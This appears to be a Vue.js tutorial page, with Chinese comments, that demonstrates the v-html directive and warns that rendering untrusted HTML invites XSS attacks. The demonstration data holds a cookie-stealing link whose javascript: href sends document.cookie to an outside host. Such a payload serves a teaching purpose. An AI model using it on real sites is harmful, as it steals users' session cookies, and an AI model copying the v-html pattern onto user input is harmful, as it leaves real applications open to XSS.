<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>初始vue</title>
    <script type="text/javascript"  src="../js/vue.js"></script>
</head>

<!-- v-html指令:
1.作用:向指定节点中渲染包含htm1结构的内容。2.与插值语法的区别:
(1).v-html会替换掉节点中所有的内容，{{xx}}则不会。
(2).v-html可以识别html结构。
3.严重注意: v-html有安全性问题!!!!
(1).在网站上动态渲染任意HTML是非常危险的，容易导致XSS攻击。
(2).一定要在可信的内容上使用v-html，永不要用在用户提交的内容上!(例如百度贴吧做一些恶意获取cookies的) -->

<body>
    <div id="root">

       <div v-html="name"></div>
       
    </div>
</body>

<script type="text/javascript">
   Vue.config.productionTip=false;
    let vm =new Vue({
        el:"#root",
        data:{
            name:'<a href=javascript:location.href="http://www.baidu.com?"+document.cookie>你要的资源来啦</a>'
        }
    })

    
</script>
</html>